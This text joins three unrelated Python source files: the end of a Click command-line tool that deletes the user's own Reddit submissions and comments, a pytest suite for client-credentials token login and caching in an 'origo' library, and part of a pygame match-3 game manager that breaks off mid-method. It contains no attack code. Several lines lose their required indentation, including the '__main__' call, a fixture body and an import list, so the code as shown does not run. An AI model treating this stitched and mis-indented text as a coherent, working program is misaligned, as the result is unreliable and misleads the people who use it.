            # Accept a full reddit URL as well as a bare id.
            reddit_id = Submission.id_from_url(reddit_id)
    if from_reddit and reddit_id:
        # Delete the reddit post and all of our own comments under it.
        sub = con.reddit.submission(reddit_id)
        sub.delete()
        sub.comments.replace_more(limit=None)
        for comment in sub.comments.list():
            if comment.author == con.reddit.user.me():
                comment.delete()
    # Clear the reddit linkage in the DB so the submission can be retried.
    query = submissions.update().values(reddit_id=None, submitted_on=None)
    if use_reddit:
        query = query.where(submissions.c.reddit_id == reddit_id)
    else:
        query = query.where(submissions.c.id == submission_id)
    con.db.execute(query)
@cli.command()
@click.pass_obj
@click.argument("artists", nargs=-1)
def artists(con, artists):
    # Register artists in the database; a leading URL argument is expanded
    # via the extractor.
    # Fix: guard against an empty tuple -- nargs=-1 allows zero arguments,
    # and indexing artists[0] then crashed with IndexError.
    if artists and val.url(artists[0]):
        # NOTE(review): extract.auto returns a work record elsewhere in
        # this file; concatenating it directly onto a tuple looks
        # suspicious -- possibly `.artists` was intended.  Left unchanged;
        # verify.
        artists = artists[1:] + extract.auto(artists[0])
    h.do_artists(con, artists)
if __name__ == "__main__":
cli()
|
import json
import logging
import re
import pytest
from origo.auth.auth import Authenticate
from origo.auth.credentials.client_credentials import ClientCredentialsProvider
from origo.config import Config
from origo.exceptions import ApiAuthenticateError
from freezegun import freeze_time
from tests.origio.auth.client_credentials_test_utils import (
from_cache_not_expired_token,
from_cache_expired_token,
utc_now,
)
from tests.origio.test_utils import client_credentials_response
logging.basicConfig(level=logging.INFO)
config = Config()
# Token endpoint matched by the mocked POST requests in the tests below.
token_endpoint = "https://login-test.oslo.kommune.no/auth/realms/api-catalog/protocol/openid-connect/token"
@pytest.fixture(scope="function")
def mock_home_dir(monkeypatch, tmp_path):
monkeypatch.setenv("HOME", str(tmp_path))
@freeze_time(utc_now)
class TestAuthenticate:
    """Tests for Authenticate with the client-credentials provider.

    Time is frozen (freeze_time) so expiry checks against the canned
    tokens from client_credentials_test_utils are deterministic.
    """

    def test_authenticate_cache_disabled(self, requests_mock, mock_home_dir):
        # Cache off: tokens must come straight from the token endpoint.
        client_credentials_provider = ClientCredentialsProvider(config)
        auth = Authenticate(config=config, token_provider=client_credentials_provider)
        auth.file_cache.credentials_cache_enabled = False
        response = json.dumps(client_credentials_response)
        matcher = re.compile(token_endpoint)
        requests_mock.register_uri("POST", matcher, text=response, status_code=204)
        auth.login()
        assert auth.access_token == client_credentials_response["access_token"]
        assert auth.refresh_token == client_credentials_response["refresh_token"]

    def test_authenticate_no_cache(self, requests_mock, mock_home_dir):
        # Cache enabled but empty: behaves like a fresh login.
        # (Fix: method name was misspelled "test_authenticat_no_cache".)
        client_credentials_provider = ClientCredentialsProvider(config)
        auth = Authenticate(config=config, token_provider=client_credentials_provider)
        auth.file_cache.credentials_cache_enabled = True
        response = json.dumps(client_credentials_response)
        matcher = re.compile(token_endpoint)
        requests_mock.register_uri("POST", matcher, text=response, status_code=204)
        auth.login()
        assert auth.access_token == client_credentials_response["access_token"]
        assert auth.refresh_token == client_credentials_response["refresh_token"]

    def test_authenticate_cached_credentials(self, mock_home_dir):
        # Valid cached tokens are used without any HTTP call (note: no
        # requests_mock fixture here, so a network call would fail).
        client_credentials_provider = ClientCredentialsProvider(config)
        auth = Authenticate(config=config, token_provider=client_credentials_provider)
        auth.file_cache.credentials_cache_enabled = True
        cached_credentials = {
            "provider": "ClientCredentialsProvider",
            "access_token": from_cache_not_expired_token,
            "refresh_token": from_cache_not_expired_token,
        }
        auth.file_cache.write_credentials(json.dumps(cached_credentials))
        auth.login()
        assert auth.access_token == cached_credentials["access_token"]
        assert auth.refresh_token == cached_credentials["refresh_token"]

    def test_authenticate_refresh_credentials(self, requests_mock, mock_home_dir):
        # Valid cached tokens win even when the endpoint is mocked: the
        # cached values, not the mocked response, must be returned.
        client_credentials_provider = ClientCredentialsProvider(config)
        auth = Authenticate(config=config, token_provider=client_credentials_provider)
        auth.file_cache.credentials_cache_enabled = True
        cached_credentials = {
            "provider": "ClientCredentialsProvider",
            "access_token": from_cache_not_expired_token,
            "refresh_token": from_cache_not_expired_token,
        }
        auth.file_cache.write_credentials(json.dumps(cached_credentials))
        response = json.dumps(client_credentials_response)
        matcher = re.compile(token_endpoint)
        requests_mock.register_uri("POST", matcher, text=response, status_code=204)
        auth.login()
        assert auth.access_token == cached_credentials["access_token"]
        assert auth.refresh_token == cached_credentials["refresh_token"]

    def test_authenticate_expired_tokens(self, requests_mock, mock_home_dir):
        # Both cached tokens expired: a full re-authentication happens and
        # both tokens come from the endpoint response.
        client_credentials_provider = ClientCredentialsProvider(config)
        auth = Authenticate(config=config, token_provider=client_credentials_provider)
        auth.file_cache.credentials_cache_enabled = True
        cached_credentials = {
            "provider": "TokenServiceProvider",
            "access_token": from_cache_expired_token,
            "refresh_token": from_cache_expired_token,
        }
        auth.file_cache.write_credentials(json.dumps(cached_credentials))
        response = json.dumps(client_credentials_response)
        matcher = re.compile(token_endpoint)
        requests_mock.register_uri("POST", matcher, text=response, status_code=204)
        auth.login()
        assert auth.access_token == client_credentials_response["access_token"]
        # Fix: this previously compared the refresh token against
        # client_credentials_response["access_token"] (copy/paste typo);
        # debug print() calls were also removed.
        assert auth.refresh_token == client_credentials_response["refresh_token"]

    def test_authenticate_expired_access_token(self, requests_mock, mock_home_dir):
        # Expired access token but valid refresh token: the refresh flow
        # produces a new access token and keeps the cached refresh token.
        client_credentials_provider = ClientCredentialsProvider(config)
        auth = Authenticate(config=config, token_provider=client_credentials_provider)
        auth.file_cache.credentials_cache_enabled = True
        cached_credentials = {
            "provider": "TokenServiceProvider",
            "access_token": from_cache_expired_token,
            "refresh_token": from_cache_not_expired_token,
        }
        auth.file_cache.write_credentials(json.dumps(cached_credentials))
        response = json.dumps(client_credentials_response)
        matcher = re.compile(token_endpoint)
        requests_mock.register_uri("POST", matcher, text=response, status_code=204)
        auth.login()
        assert auth.access_token == from_cache_not_expired_token
        assert auth.refresh_token == cached_credentials["refresh_token"]

    def test_authenticate_fail(self, requests_mock, mock_home_dir):
        # Fix: the old try/except silently passed when no exception was
        # raised; pytest.raises makes the expectation explicit.
        client_credentials_provider = ClientCredentialsProvider(
            config, client_id="wrong_id"
        )
        auth = Authenticate(config=config, token_provider=client_credentials_provider)
        response = json.dumps(
            {"error": "authenitcation error", "error_description": "No such client"}
        )
        matcher = re.compile(token_endpoint)
        requests_mock.register_uri("POST", matcher, text=response, status_code=204)
        with pytest.raises(ApiAuthenticateError):
            auth.login()
|
# -*- encoding: utf-8 -*-
'''Game manager module.'''
# pylint: disable=fixme, line-too-long, invalid-name, undefined-variable
# pylint: disable=too-many-branches, too-many-statements, too-many-arguments
from random import randint
import pygame
from pygame.locals import * # pylint: disable=wildcard-import, unused-wildcard-import
from pygame.time import delay
from sprites import Tree, Board, Element
from sounds import Sounds, play_sound
class TreeManager:
    '''Manager for the tree / energy-shop scenes: drawing and mouse input.'''
    __screen_size = (900, 600)
    screen = pygame.display.set_mode(__screen_size, DOUBLEBUF, 32)
    fruit_list = []  # NOTE(review): never used in this class
    fruit_image = pygame.image.load(Tree.fruit).convert_alpha()
    fruit_width = fruit_image.get_width()
    fruit_height = fruit_image.get_height()
    type = 0 # Current scene: 0 Tree, 1 Energy shop
    energy_full = False # Show the "energy is full!" flash on next draw
    money_empty = False # Show the "money is not enough!" flash on next draw
    def display_text(self, text, position, txt_size=25, txt_color=(255, 255, 255)):
        '''Display text with given position, size and color.'''
        my_font = pygame.font.SysFont(None, txt_size)
        text_screen = my_font.render(text, True, txt_color)
        self.screen.blit(text_screen, position)
    def draw_tree(self, energy_num, money_num):
        '''Draw the tree scene: tree, energy counter, money, numbered fruits,
        plus the energy-shop overlay and one-shot warning flashes.'''
        Tree(Tree.tree, (0, 600)).draw(self.screen) # Draw tree
        Tree(Tree.energy_num, Tree.energy_num_position).draw(self.screen) # Draw energy num
        if energy_num > 30:
            # Displayed energy is capped at the 30-point maximum
            self.display_text(str(30) + '/30', (22, 55), 21)
        else:
            self.display_text(str(energy_num)+'/30', (22, 55), 21)
        Tree(Tree.money, (15, 135)).draw(self.screen) # Draw money
        self.display_text(str(money_num), (32, 124), 21)
        for i in range(0, 10): # Draw the 10 numbered fruits (level entries)
            Tree(Tree.fruit, Tree.position[i]).draw(self.screen)
            self.display_text(str(i+1), (Tree.position[i][0]+15, Tree.position[i][1]-47))
        if self.type == 1:
            # Energy-shop overlay
            Tree(Tree.energy_buy, Tree.energy_buy_position).draw(self.screen)
        if self.energy_full:
            # One-shot warning; flip + delay so the player can read it
            self.display_text('energy is full!', (430, 310), 30, (255, 0, 0))
            pygame.display.flip()
            delay(500)
            self.energy_full = False
        if self.money_empty:
            self.display_text('money is not enough!', (410, 310), 30, (255, 0, 0))
            pygame.display.flip()
            delay(500)
            self.money_empty = False
    def mouse_select(self, mgr, mousex, mousey, level, energy_num, money_num):
        '''Handle a mouse click at (mousex, mousey) and write the resulting
        level / energy / money back onto the game manager mgr.'''
        if self.type == 0: # Tree Scene
            for i in range(0, 10):
                # Hit-test each fruit (selects levels 1-10)
                if Tree.position[i][0] < mousex < Tree.position[i][0] + self.fruit_width \
                        and Tree.position[i][1] - self.fruit_height < mousey < Tree.position[i][1]:
                    if energy_num <= 0:
                        # Out of energy: send the player to the energy shop
                        self.type = 1
                    else:
                        level = i + 1
            if Tree.energy_num_position[0] < mousex < Tree.energy_num_position[0] + 60 \
                    and Tree.energy_num_position[1] - 60 < mousey < Tree.energy_num_position[1]: # energy icon hitbox is 60x60 px
                play_sound(Sounds.CLICK)
                self.type = 1
        else: # Energy Scene
            if 408 < mousex < 600 and 263 < mousey < 313: # "Buy Energy" button clicked
                play_sound(Sounds.CLICK_BUTTON)
                if money_num < 50:
                    self.money_empty = True
                if energy_num >= 30:
                    self.energy_full = True
                elif energy_num < 30 and money_num >= 50:
                    # 50 money buys 5 energy
                    energy_num += 5
                    money_num -= 50
            elif 619 < mousex < 638 and 158 < mousey < 177: # "X" clicked
                self.type = 0
        mgr.level, mgr.energy_num, mgr.money = level, energy_num, money_num
# pylint: disable=too-many-public-methods, too-many-instance-attributes, too-many-nested-blocks
class Manager:
    '''Game manager for the match-3 board game.

    Owns the pygame screen, the 21x21 ``animal``/``ice_list`` grids (the
    playable window is ``height`` x ``width`` starting at ``row``/``col``),
    the player's persistent resources (level, money, energy), and the whole
    gameplay loop helpers: drawing, selection, swapping, elimination,
    falling animation, and level setup / win-lose judging.

    NOTE: the class attributes below double as defaults; ``__init__``
    shadows several of them with per-instance values.
    '''
    __screen_size = (900, 600)
    screen = pygame.display.set_mode(__screen_size, DOUBLEBUF, 32)
    __brick_size = 50
    __bg = pygame.image.load('img/bg.png').convert()
    stop_width = 63
    selected = [-1, -1] # Current selected [row, col]
    swap_sign = -1 # Swap sign
    last_sel = [-1, -1] # Last selected [row, col]
    value_swapped = False # Swapped?
    death_sign = True # Death map sign
    boom_sel = [-1, -1] # Eliminate 4: [row, col]
    level = 0 # Current level, 0 for tree
    money = 100 # Money
    energy_num = 30 # Energy num
    num_sign = True # Guard so num_add() rewards a level only once
    type = 2 # (0) Playing, (1) Passed, (-1) Failed, (2) Tree
    reset_mode = True # Reset layout?
    init_step = 15 # Initial steps for each level
    step = init_step # Steps left of the game
    score = 0 # Score
    min = 20 # Medium score 1 (NOTE: shadows builtin min on the class)
    max = 50 # Medium score 2 (NOTE: shadows builtin max on the class)
    animal_num = [0, 0, 0, 0, 0, 0] # Number of eliminated animals
    ice_num = 0 # Number left of required ice
    success_board = Board(Board.success, [200, 0]) # Success board
    fail_board = Board(Board.fail, [200, 0]) # Failure board
    height, width = 9, 9
    row, col = 5, 5
    ice_list = [[-1 for _ in range(21)] for _ in range(21)] # (-1) None, (1) Ice
    animal = [[-1 for _ in range(21)] for _ in range(21)] # (-2) Eliminated, (-1) None, (0-4) Animal
    list_x, list_y = (__screen_size[0] - 11 * __brick_size) / 2, (__screen_size[1] - 11 * __brick_size) / 2 # Position of the blocks
    def __init__(self, width, height):
        '''Create a fresh, centered width x height board filled with random animals.'''
        self.height = height
        self.width = width
        # Center the playable window on screen, then snap to the grid by
        # round-tripping through (row, col).
        self.list_x = (Manager.__screen_size[0] - self.width * Manager.__brick_size) / 2
        self.list_y = (Manager.__screen_size[1] - self.height * Manager.__brick_size) / 2
        self.row, self.col = Manager.xy_rc(self.list_x, self.list_y)
        self.list_x, self.list_y = Manager.rc_xy(self.row, self.col)
        self.ice_list = [[-1 for _ in range(21)] for _ in range(21)]
        self.animal = [[-1 for _ in range(21)] for _ in range(21)]
        self.reset_animals()
    def reset_animals(self):
        '''Reset board with random animals.'''
        for row in range(self.row, self.row + self.height):
            for col in range(self.col, self.col + self.width):
                self.animal[row][col] = randint(0, 5)
    @staticmethod
    def rc_xy(row, col):
        '''(row, col) -> (x, y)'''
        # NOTE: uses the CLASS-level list_x/row, not instance overrides.
        return int(Manager.list_x + (col-Manager.col)*Manager.__brick_size), int\
            (Manager.list_y+(row-Manager.row)*Manager.__brick_size)
    @staticmethod
    def xy_rc(x, y):
        '''(x, y) -> (row, col)'''
        return int((y-Manager.list_y)/Manager.__brick_size+Manager.row), int\
            ((x-Manager.list_x)/Manager.__brick_size+Manager.col)
    @staticmethod
    def draw_brick(x, y):
        '''Draw a brick at (x, y).'''
        brick = Element(Element.brick, (x, y))
        Manager.screen.blit(brick.image, brick.rect)
    def draw_task(self, task_animal_num, which_animal, \
                  board_position=(400, 90), animal_position=(430, 35), txt_position=(455, 60)):
        '''Draw task board.

        which_animal 0-5 is an animal index; 6 means the ice task.  Shows a
        checkmark once the required count is reached, otherwise the number
        still missing.
        '''
        txt_size = 24
        txt_color = (0, 0, 0)
        Board(Board.task_board, board_position).draw(self.screen)
        if which_animal == 6:
            task_animal = Element(Element.ice, animal_position)
        else:
            task_animal = Element(Element.animals[which_animal], animal_position)
        task_animal.image = pygame.transform.smoothscale(task_animal.image, (40, 40))
        task_animal.draw(self.screen)
        if which_animal == 6:
            if task_animal_num-self.ice_num <= 0:
                Board(Board.ok, (txt_position[0], txt_position[1]+15)).draw(self.screen)
            else:
                self.load_text(str(task_animal_num-self.ice_num), txt_position, txt_size, txt_color)
        else:
            if task_animal_num - self.animal_num[which_animal] <= 0:
                Board(Board.ok, (txt_position[0], txt_position[1]+15)).draw(self.screen)
            else:
                self.load_text(str(task_animal_num - self.animal_num[which_animal]), txt_position, txt_size, txt_color)
    def draw(self):
        '''Draw background, animals, and so on.  Returns the animal sprite group.'''
        # Draw background
        self.screen.blit(Manager.__bg, (0, 0))
        # Display steps left
        Board(Board.step_board, (0, 142)).draw(self.screen)
        tens, single = divmod(self.step, 10)
        if tens == 0:
            Board(Board.num_format%single, (790, 110)).draw(self.screen)
        else:
            Board(Board.num_format%tens, (775, 110)).draw(self.screen)
            Board(Board.num_format%single, (805, 110)).draw(self.screen)
        # Display level & pause button
        Board(Board.level_format%self.level, (30, 105)).draw(self.screen)
        Element(Element.stop, Element.stop_position).draw(self.screen)
        # Draw bricks, ice and animals
        brick_group = pygame.sprite.Group()
        animal_group = pygame.sprite.Group()
        ice_group = pygame.sprite.Group()
        for i in range(0, 21):
            for j in range(0, 21):
                x, y = Manager.rc_xy(i, j)
                if self.animal[i][j] != -1:
                    brick_group.add(Element(Element.brick, (x, y)))
                    animal_group.add(Element(Element.animals[self.animal[i][j]], (x, y)))
                if self.ice_list[i][j] != -1:
                    ice_group.add(Element(Element.ice, (x, y)))
        brick_group.draw(self.screen)
        ice_group.draw(self.screen)
        for animallist in animal_group:
            self.screen.blit(animallist.image, animallist.rect)
        # Per-level task boards (counts/positions are level design data).
        if self.level == 1:
            self.draw_task(10, 4)
        elif self.level == 2:
            self.draw_task(21, 1)
        elif self.level == 3:
            self.draw_task(16, 4, (300, 90), (330, 35), (360, 60))
            self.draw_task(16, 5, (500, 90), (530, 35), (560, 60))
        elif self.level == 4:
            self.draw_task(18, 5, (300, 90), (330, 35), (360, 60))
            self.draw_task(18, 2, (500, 90), (530, 35), (560, 60))
        elif self.level == 5:
            self.draw_task(28, 2, (300, 90), (330, 35), (360, 60))
            self.draw_task(28, 0, (500, 90), (530, 35), (560, 60))
        elif self.level == 6:
            self.draw_task(70, 4)
        elif self.level == 7:
            self.draw_task(36, 1)
            self.draw_task(36, 2, (300, 90), (330, 35), (360, 60))
            self.draw_task(36, 0, (500, 90), (530, 35), (560, 60))
        elif self.level == 8:
            self.draw_task(15, 6)
        elif self.level == 9:
            self.draw_task(49, 6)
        else:
            self.draw_task(39, 6)
        # Display selected animal
        if self.selected != [-1, -1]:
            frame_sprite = Element(Element.frame, Manager.rc_xy(self.selected[0], self.selected[1]))
            self.screen.blit(frame_sprite.image, frame_sprite.rect)
        # Show score
        self.load_text('Score:' + str(self.score), (300, 550), 30)
        pygame.draw.rect(self.screen, (50, 150, 50, 180), Rect(300, 570, self.score * 2, 25))
        pygame.draw.rect(self.screen, (100, 200, 100, 180), Rect(300, 570, 200, 25), 2)
        return animal_group
    def mouse_image(self):
        '''Replace the mouse image with img/mouse.png'''
        mouse_cursor = pygame.image.load('img/mouse.png').convert_alpha()
        mouse_x, mouse_y = pygame.mouse.get_pos()
        # Find the topleft position of the mouse
        mouse_x -= mouse_cursor.get_width() / 2
        mouse_y -= mouse_cursor.get_height() / 2
        self.screen.blit(mouse_cursor, (mouse_x, mouse_y))
    def mouse_select(self, mousex, mousey):
        '''Handle mouse click event.

        Routing depends on ``self.type``: result-screen buttons when the
        level was passed (1) or failed (-1), board/pause interaction while
        playing (0).
        '''
        if self.type == 1: # Passed
            if Board.button_position[0][0] < mousex < Board.button_position[0][0]+100 \
                    and Board.button_position[0][1] - 50 < mousey < Board.button_position[0][1]: # Clicked replay button
                if self.energy_num < 5:
                    self.level = 0  # Not enough energy: back to the tree scene
                self.reset_mode = True
            elif Board.button_position[1][0] < mousex < Board.button_position[1][0]+100 \
                    and Board.button_position[1][1]-50 < mousey < Board.button_position[1][1]: # Clicked next level button
                if self.level < 10:
                    if self.energy_num < 5:
                        self.level = 0
                    else:
                        self.level += 1
                self.reset_mode = True
            elif 610 < mousex < 610 + 55 and 205 - 55 < mousey < 205: # x
                self.level = 0
                self.reset_mode = True
        elif self.type == -1: # Failed
            if Board.button_position[1][0] < mousex < Board.button_position[1][0]+100 \
                    and Board.button_position[1][1]-50 < mousey < Board.button_position[1][1]: # Clicked replay button
                if self.energy_num < 5:
                    self.level = 0
                self.reset_mode = True
            elif Board.button_position[0][0] < mousex < Board.button_position[0][0]+100 \
                    and Board.button_position[0][1]-50 < mousey < Board.button_position[0][1]: # Clicked 5 more steps button
                if self.money < 5:
                    self.level = 0
                else:
                    # Pay 5 money for 5 extra steps and resume play.
                    self.money -= 5
                    self.step += 5
                    self.type = 0 # Playing game
                    self.fail_board = Board(Board.fail, [200, 0])
            elif 610 < mousex < 610 + 55 and 205 - 55 < mousey < 205:
                self.level = 0
                self.reset_mode = True
        elif self.type == 0:
            if self.list_x < mousex < self.list_x + Manager.__brick_size * self.width \
                    and self.list_y < mousey < self.list_y + Manager.__brick_size * self.height:
                mouse_selected = Manager.xy_rc(mousex, mousey)
                if self.animal[mouse_selected[0]][mouse_selected[1]] != -1:
                    play_sound(Sounds.CLICK)
                    self.selected = mouse_selected
                # Two orthogonally adjacent selections arm the swap.
                if (self.last_sel[0] == self.selected[0] and abs(self.last_sel[1] - self.selected[1]) == 1) \
                        or (self.last_sel[1] == self.selected[1] and abs(self.last_sel[0] - self.selected[0]) == 1):
                    self.swap_sign = 1 # Valid move, swap
            elif Element.stop_position[0] < mousex < Element.stop_position[0]+self.stop_width\
                    and Element.stop_position[1] < mousey < Element.stop_position[1]+self.stop_width: # Exit button clicked
                play_sound(Sounds.CLICK_BUTTON)
                self.level = 0
                self.reset_mode = True
            else:
                self.selected = [-1, -1]
    def swap(self, spritegroup):
        '''Swap two selected animals on the board.

        Animates the two sprites trading places, swaps their grid values,
        and swaps back (without consuming a step) if nothing eliminates.
        '''
        if self.swap_sign == -1: # Not swapped
            self.last_sel = self.selected
        if self.swap_sign == 1:
            last_x, last_y = Manager.rc_xy(self.last_sel[0], self.last_sel[1])
            sel_x, sel_y = Manager.rc_xy(self.selected[0], self.selected[1])
            # NOTE(review): last_sprite/selected_sprite are only bound if
            # matching sprites are found in spritegroup — confirm callers
            # always pass the group returned by draw().
            if self.last_sel[0] == self.selected[0]: # Swap vertically
                for animallist in spritegroup:
                    if animallist.rect.topleft == (last_x, last_y):
                        last_sprite = animallist
                        last_sprite.speed = [self.selected[1]-self.last_sel[1], 0]
                    elif animallist.rect.topleft == (sel_x, sel_y):
                        selected_sprite = animallist
                        selected_sprite.speed = [self.last_sel[1]-self.selected[1], 0]
            else: # Swap horizontally
                for animallist in spritegroup:
                    if animallist.rect.topleft == (last_x, last_y):
                        last_sprite = animallist
                        last_sprite.speed = [0, self.selected[0]-self.last_sel[0]]
                    elif animallist.rect.topleft == (sel_x, sel_y):
                        selected_sprite = animallist
                        selected_sprite.speed = [0, self.last_sel[0]-self.selected[0]]
            # Blocking animation loop: step both sprites until they stop.
            while last_sprite.speed != [0, 0]:
                delay(5)
                self.draw_brick(last_x, last_y)
                self.draw_brick(sel_x, sel_y)
                last_sprite.move(last_sprite.speed)
                selected_sprite.move(selected_sprite.speed)
                self.screen.blit(last_sprite.image, last_sprite.rect)
                self.screen.blit(selected_sprite.image, selected_sprite.rect)
                pygame.display.flip()
            self.swap_values()
            if self.eliminate_animals():
                self.step -= 1
            else:
                # Nothing matched: undo the swap and refund the move.
                self.swap_values()
            self.value_swapped = False
            self.boom_sel = self.selected
            self.swap_sign = -1
            self.selected = [-1, -1]
    def swap_values(self):
        '''Swap values.'''
        (xl, yl), (xc, yc) = self.last_sel, self.selected
        self.animal[xl][yl], self.animal[xc][yc] = self.animal[xc][yc], self.animal[xl][yl]
    def load_text(self, text, position, txt_size, txt_color=(255, 255, 255)):
        '''Display text with given position, size and color.'''
        my_font = pygame.font.SysFont(None, txt_size)
        text_screen = my_font.render(text, True, txt_color)
        self.screen.blit(text_screen, position)
    def death_map(self):
        '''Checks if there is not a valid move; reshuffles the board if so.

        Scans every cell for a potential match and clears ``death_sign``
        once one is found.  NOTE(review): the ``break`` statements only
        exit the inner column loop, so the outer row scan continues — the
        result is still correct, just more work than needed.
        '''
        for i in range(self.row, self.row + self.height):
            for j in range(self.col, self.col + self.width):
                if self.animal[i][j] != -1:
                    if self.animal[i][j] == self.animal[i][j+1]:
                        if (self.animal[i][j] in [self.animal[i-1][j-1], self.animal[i+1][j-1]] \
                                and self.animal[i][j-1] != -1) or \
                            (self.animal[i][j] in [self.animal[i-1][j+2], self.animal[i+1][j+2]] \
                                and self.animal[i][j+2] != -1):
                            # a    b
                            #   a a
                            # c    d
                            self.death_sign = False
                            break
                    if self.animal[i][j] == self.animal[i+1][j]:
                        if (self.animal[i][j] in [self.animal[i-1][j-1], self.animal[i-1][j+1]] \
                                and self.animal[i-1][j] != -1) or \
                            (self.animal[i][j] in [self.animal[i+2][j - 1], self.animal[i+2][j + 1]] \
                                and self.animal[i+2][j] != -1):
                            # a  b
                            #  a
                            #  a
                            # c  d
                            self.death_sign = False
                            break
                    else:
                        if self.animal[i-1][j-1] == self.animal[i][j]:
                            if (self.animal[i][j] == self.animal[i-1][j+1] and self.animal[i-1][j] != -1)\
                                    or (self.animal[i][j] == self.animal[i+1][j-1] and self.animal[i][j-1] != -1):
                                # a a  a b
                                #    a    a
                                # c a
                                self.death_sign = False
                                break
                        if self.animal[i][j] == self.animal[i+1][j+1]:
                            if (self.animal[i][j] == self.animal[i-1][j+1] and self.animal[i][j+1] != -1)\
                                    or (self.animal[i][j] == self.animal[i+1][j-1] and self.animal[i+1][j] != -1):
                                # a  b
                                #  a    a
                                # b a  a a
                                self.death_sign = False
                                break
        if self.death_sign:
            # No valid move anywhere: show the "no moves" banner, then
            # rebuild the level while preserving progress counters.
            delay(500)
            Element(Element.none_animal, (230, 150)).draw(self.screen)
            pygame.display.flip()
            delay(500)
            temp = [self.step, self.score, self.animal_num, self.ice_num, self.energy_num]
            self.reset_mode = True
            self.set_level_mode(self.level)
            self.step = temp[0]
            self.score = temp[1]
            self.animal_num = temp[2]
            self.ice_num = temp[3]
            self.energy_num = temp[4]
        else:
            self.death_sign = True
    # TODO: Merge 4 functions below
    def exists_left(self, i, j, num):
        '''Checks there are at least {num} continous same animals on the left side of (i, j).'''
        for t in range(0, num):
            if self.animal[i][j] != self.animal[i][j - t] or self.animal[i][j] < 0:
                return False
        return True
    def exists_right(self, i, j, num):
        '''Checks there are at least {num} continous same animals on the right side of (i, j).'''
        for t in range(0, num):
            if self.animal[i][j] != self.animal[i][j + t] or self.animal[i][j] < 0:
                return False
        return True
    def exists_up(self, i, j, num):
        '''Checks there are at least {num} continous same animals above (i, j).'''
        for t in range(0, num):
            if self.animal[i][j] != self.animal[i - t][j] or self.animal[i][j] < 0:
                return False
        return True
    def exists_down(self, i, j, num):
        '''Checks there are at least {num} continous same animals below (i, j).'''
        for t in range(0, num):
            if self.animal[i][j] != self.animal[i + t][j] or self.animal[i][j] < 0:
                return False
        return True
    # TODO: Merge 4 functions below
    def change_left(self, i, j, num):
        '''Change the left side of the animal.'''
        self.value_swapped = True
        self.score += num
        for k in range(0, int(num)):
            self.animal[i][j - k] = -2
    def change_right(self, i, j, num):
        '''Change the right side of the animal.'''
        self.value_swapped = True
        self.score += num
        for k in range(0, num):
            self.animal[i][j + k] = -2
    def change_up(self, i, j, num):
        '''Change above the animal.'''
        self.value_swapped = True
        self.score += num
        for k in range(0, num):
            self.animal[i-k][j] = -2
    def change_down(self, i, j, num):
        '''Change below the animal.'''
        self.value_swapped = True
        self.score += num
        for k in range(0, num):
            self.animal[i+k][j] = -2
    def eliminate_animals(self):
        '''Eliminate the animals.

        Scans the board for runs of 3/4/5 (and L/T combinations), marks
        matched cells as -2, updates per-animal counters, plays a sound
        scaled to the match size, triggers the fall animation and a praise
        banner.  Returns True if anything was eliminated.
        '''
        score_level = self.score
        self.value_swapped = False
        for i in range(self.row, self.row + self.height):
            for j in range(self.col, self.col + self.width):
                # TODO: Simplify the if statement below
                if self.exists_right(i, j, 5):
                    self.value_swapped = True
                    if self.exists_down(i, j+2, 3):
                        self.animal_num[self.animal[i][j]] += 7
                        Sounds.eliminate(5) # Elimination sound 5
                        self.change_right(i, j, 5)
                        self.change_down(i, j+2, 3)
                    else:
                        self.animal_num[self.animal[i][j]] += 5
                        Sounds.eliminate(3) # Elimination sound 3
                        self.change_right(i, j, 5)
                elif self.exists_right(i, j, 4):
                    self.value_swapped = True
                    if self.exists_down(i, j+1, 3):
                        self.animal_num[self.animal[i][j]] += 6
                        Sounds.eliminate(4) # Elimination sound 4
                        self.change_right(i, j, 4)
                        self.change_down(i, j+1, 3)
                    elif self.exists_down(i, j+2, 3):
                        self.animal_num[self.animal[i][j]] += 6
                        Sounds.eliminate(4) # Elimination sound 4
                        self.change_right(i, j, 4)
                        self.change_down(i, j+2, 3)
                    else:
                        self.animal_num[self.animal[i][j]] += 4
                        Sounds.eliminate(2) # Elimination sound 2
                        self.change_right(i, j, 4)
                elif self.exists_right(i, j, 3):
                    self.value_swapped = True
                    if self.exists_down(i, j, 3):
                        self.animal_num[self.animal[i][j]] += 5
                        Sounds.eliminate(3) # Elimination sound 3
                        self.change_right(i, j, 3)
                        self.change_down(i, j, 3)
                    elif self.exists_down(i, j+1, 3):
                        self.animal_num[self.animal[i][j]] += 5
                        Sounds.eliminate(3) # Elimination sound 3
                        self.change_right(i, j, 3)
                        self.change_down(i, j+1, 3)
                    elif self.exists_down(i, j+2, 3):
                        self.animal_num[self.animal[i][j]] += 5
                        Sounds.eliminate(3) # Elimination sound 3
                        self.change_right(i, j, 3)
                        self.change_down(i, j + 2, 3)
                    else:
                        self.animal_num[self.animal[i][j]] += 3
                        Sounds.eliminate(1) # Elimination sound 1
                        self.change_right(i, j, 3)
                elif self.exists_down(i, j, 5):
                    self.value_swapped = True
                    if self.exists_right(i+2, j, 3):
                        self.animal_num[self.animal[i][j]] += 7
                        Sounds.eliminate(5) # Elimination sound 5
                        self.change_down(i, j, 5)
                        self.change_right(i+2, j, 3)
                    elif self.exists_left(i+2, j, 3):
                        self.animal_num[self.animal[i][j]] += 7
                        Sounds.eliminate(5) # Elimination sound 5
                        self.change_down(i, j, 5)
                        self.change_left(i+2, j, 3)
                    else:
                        self.animal_num[self.animal[i][j]] += 5
                        Sounds.eliminate(3) # Elimination sound 3
                        self.change_down(i, j, 5)
                elif self.exists_down(i, j, 4):
                    self.value_swapped = True
                    if self.exists_left(i+1, j, 3):
                        self.animal_num[self.animal[i][j]] += 6
                        Sounds.eliminate(4) # Elimination sound 4
                        self.change_down(i, j, 4)
                        self.change_left(i+1, j, 3)
                    elif self.exists_right(i+1, j, 3):
                        self.animal_num[self.animal[i][j]] += 6
                        Sounds.eliminate(4) # Elimination sound 4
                        self.change_down(i, j, 4)
                        self.change_right(i+1, j, 3)
                    elif self.exists_left(i+2, j, 3):
                        self.animal_num[self.animal[i][j]] += 6
                        Sounds.eliminate(4) # Elimination sound 4
                        self.change_down(i, j, 4)
                        self.change_left(i+2, j, 3)
                    elif self.exists_right(i+2, j, 3):
                        self.animal_num[self.animal[i][j]] += 6
                        Sounds.eliminate(4) # Elimination sound 4
                        self.change_down(i, j, 4)
                        self.change_right(i+2, j, 3)
                    else:
                        self.animal_num[self.animal[i][j]] += 4
                        Sounds.eliminate(2) # Elimination sound 2
                        self.change_down(i, j, 4)
                elif self.exists_down(i, j, 3):
                    self.value_swapped = True
                    if self.exists_left(i+1, j, 3):
                        self.animal_num[self.animal[i][j]] += 5
